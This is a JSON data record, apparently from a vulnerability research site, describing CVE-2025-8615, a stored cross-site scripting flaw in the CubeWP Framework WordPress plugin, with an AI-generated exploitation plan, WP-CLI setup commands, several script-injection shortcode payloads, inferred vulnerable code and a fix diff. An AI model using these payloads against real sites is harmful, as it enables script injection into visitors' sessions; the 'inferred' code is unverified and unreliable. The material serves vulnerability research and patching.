[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqwf41vF1FelVyOTNaz-VEEh5ruEqT8yrYpzN7-QeASI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-8615","cubewp-authenticated-contributor-stored-cross-site-scripting-via-cubewpshortcodetaxonomy-shortcode","CubeWP \u003C= 1.1.26 - Authenticated (Contributor+) Stored Cross-Site Scripting via cubewp_shortcode_taxonomy Shortcode","The CubeWP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cubewp_shortcode_taxonomy shortcode in all versions up to, and including, 1.1.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cubewp-framework",null,"\u003C=1.1.26","1.1.27","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-16 19:29:36","2026-01-17 08:24:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fefc2baf0-38d9-44be-b439-3585b2f1d4a5?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-8615 (CubeWP Framework XSS)\n\n## 1. Vulnerability Summary\n**CVE-2025-8615** is a Stored Cross-Site Scripting (XSS) vulnerability in the **CubeWP Framework** plugin (\u003C= 1.1.26). The flaw exists within the `cubewp_shortcode_taxonomy` shortcode. The plugin fails to sufficiently sanitize or escape user-supplied attributes before outputting them in the HTML of a page. This allows a user with **Contributor-level** permissions or higher to inject arbitrary JavaScript into a post or page.\n\n## 2. Attack Vector Analysis\n* **Shortcode:** `[cubewp_shortcode_taxonomy]`\n* **Vulnerable Parameters:** Attributes passed to the shortcode (e.g., `class`, `container_class`, or `taxonomy`).\n* **Authentication:** Requires **Contributor+** (Contributor, Author, Editor, or Admin) privileges to create or edit posts where shortcodes are allowed.\n* **Preconditions:** The plugin must be active. A post containing the malicious shortcode must be published or previewed.\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers the shortcode in the `init` hook (likely in a class handling shortcodes):\n `add_shortcode('cubewp_shortcode_taxonomy', [$this, 'cubewp_shortcode_taxonomy_callback']);`\n2. **Processing:** When a post is rendered, WordPress calls the callback function.\n3. **Attributes:** The callback receives an `$atts` array.\n4. **Sink:** The callback processes these attributes and generates HTML. The vulnerability occurs when an attribute (like a CSS class or data attribute) is concatenated into the HTML string without using `esc_attr()` or `esc_html()`.\n * *Example of vulnerable logic:* \n `$html = '\u003Cdiv class=\"' . $atts['class'] . '\">...\u003C\u002Fdiv>'; return $html;`\n5. **Output:** The unsanitized HTML is returned to the WordPress content filter and displayed on the frontend.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by **saving a post** containing the shortcode. \n* **Injection Phase:** While saving a post via the WordPress UI requires a nonce (`_wpnonce`), an automated security agent can bypass the web UI entirely by using **WP-CLI** to create the post directly in the database. This avoids the need to hunt for editor nonces.\n* **Trigger Phase:** Viewing the post does not require a nonce.\n\nIf the exploitation required an AJAX call to preview the shortcode:\n1. Identify the JS localization variable (e.g., `window.cubewp_params?.nonce`).\n2. Create a post with the shortcode using `wp post create`.\n3. Navigate to that page using `browser_navigate`.\n4. Execute `browser_eval(\"window.cubewp_params.nonce\")` to retrieve it.\n*For this specific CVE (Stored XSS in shortcode), WP-CLI for injection is the most efficient path.*\n\n## 5. Exploitation Strategy\n### Step 1: Inject the Malicious Shortcode\nUse the `wp-cli` tool to create a post as a Contributor.\n\n**Payload Construction:**\nWe will target the `class` or `container_class` attributes, as these are frequently used in Framework-style plugins to allow custom styling but are often left unescaped.\n\n**Payload:** `[cubewp_shortcode_taxonomy class='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n\n### Step 2: Trigger the XSS\nNavigate to the newly created post's URL using the `http_request` tool (acting as a guest or admin) to see if the script executes.\n\n### Step 3: HTTP Request Details (Trigger)\n* **Method:** `GET`\n* **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]` (where POST_ID is returned by Step 1)\n* **Expected Behavior:** The response HTML should contain the literal string `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure `cubewp-framework` version 1.1.26 is installed and active.\n2. **User Creation:** Create a user with the `contributor` role.\n ```bash\n wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n ```\n3. **Post Creation (via WP-CLI):**\n ```bash\n wp post create --post_type=post --post_status=publish --post_title=\"XSS Test\" --post_content='[cubewp_shortcode_taxonomy class=\"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]' --post_author=$(wp user get attacker --field=ID)\n ```\n\n## 7. Expected Results\n* The HTTP GET request to the post URL will return a status `200 OK`.\n* The response body will contain the injected script tag.\n* In a browser context, an alert box showing the domain would appear.\n* The HTML source will look something like:\n `\u003Cdiv class=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fdiv>`\n\n## 8. Verification Steps\n1. **Check Post Content:** Verify the shortcode was saved correctly.\n ```bash\n wp post get [POST_ID] --field=post_content\n ```\n2. **Verify Rendering:** Use `curl` (via `http_request`) to verify the sink.\n ```bash\n # Search for the script tag in the output\n http_request GET \"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\" | grep \"\u003Cscript>alert\"\n ```\n\n## 9. Alternative Approaches\nIf the `class` attribute is sanitized, try other common shortcode attributes used in CubeWP:\n* `taxonomy='\">\u003Cimg src=x onerror=alert(1)>'`\n* `container_class='\">\u003Csvg onload=alert(1)>'`\n* `item_id='123\" onmouseover=\"alert(1)\" style=\"display:block;width:100px;height:100px;\"'`\n\nIf the plugin requires specific taxonomies to exist before the shortcode renders anything, create a temporary term:\n```bash\nwp term create category \"Test Cat\"\n```\nThen use that in the shortcode:\n`[cubewp_shortcode_taxonomy taxonomy=\"category\" class='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`","The CubeWP Framework plugin is vulnerable to Stored Cross-Site Scripting via the 'cubewp_shortcode_taxonomy' shortcode in versions up to 1.1.26. Authenticated attackers with Contributor-level permissions can inject malicious scripts by providing unescaped values for shortcode attributes like 'class' or 'container_class'.","\u002F\u002F Inferred logic within the shortcode callback function\n\u002F\u002F File: cubewp-framework\u002Fincludes\u002Fshortcodes\u002Fclass-cubewp-shortcodes.php\n\npublic function cubewp_shortcode_taxonomy_callback($atts) {\n $atts = shortcode_atts(array(\n 'taxonomy' => 'category',\n 'class' => '',\n 'container_class' => ''\n ), $atts);\n\n $output = '\u003Cdiv class=\"' . $atts['container_class'] . '\">';\n $output .= '\u003Cul class=\"' . $atts['class'] . '\">';\n \u002F\u002F ... (logic to iterate taxonomies)\n return $output;\n}","--- a\u002Fincludes\u002Fshortcodes\u002Fclass-cubewp-shortcodes.php\n+++ b\u002Fincludes\u002Fshortcodes\u002Fclass-cubewp-shortcodes.php\n@@ -10,2 +10,2 @@\n- $output = '\u003Cdiv class=\"' . $atts['container_class'] . '\">';\n- $output .= '\u003Cul class=\"' . $atts['class'] . '\">';\n+ $output = '\u003Cdiv class=\"' . esc_attr($atts['container_class']) . '\">';\n+ $output .= '\u003Cul class=\"' . esc_attr($atts['class']) . '\">';","The exploit targets the 'cubewp_shortcode_taxonomy' shortcode processing. A Contributor+ user creates or edits a post and inserts a shortcode payload such as [cubewp_shortcode_taxonomy class='\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']. When the post is saved and then rendered on the frontend, the unescaped 'class' attribute breaks out of the HTML tag context and executes the injected JavaScript in the context of the site visitor's session.","gemini-3-flash-preview","2026-05-05 06:57:20","2026-05-05 06:59:16",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.1.26","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcubewp-framework\u002Ftags\u002F1.1.26","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcubewp-framework.1.1.26.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcubewp-framework\u002Ftags\u002F1.1.27","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcubewp-framework.1.1.27.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcubewp-framework\u002Ftags"]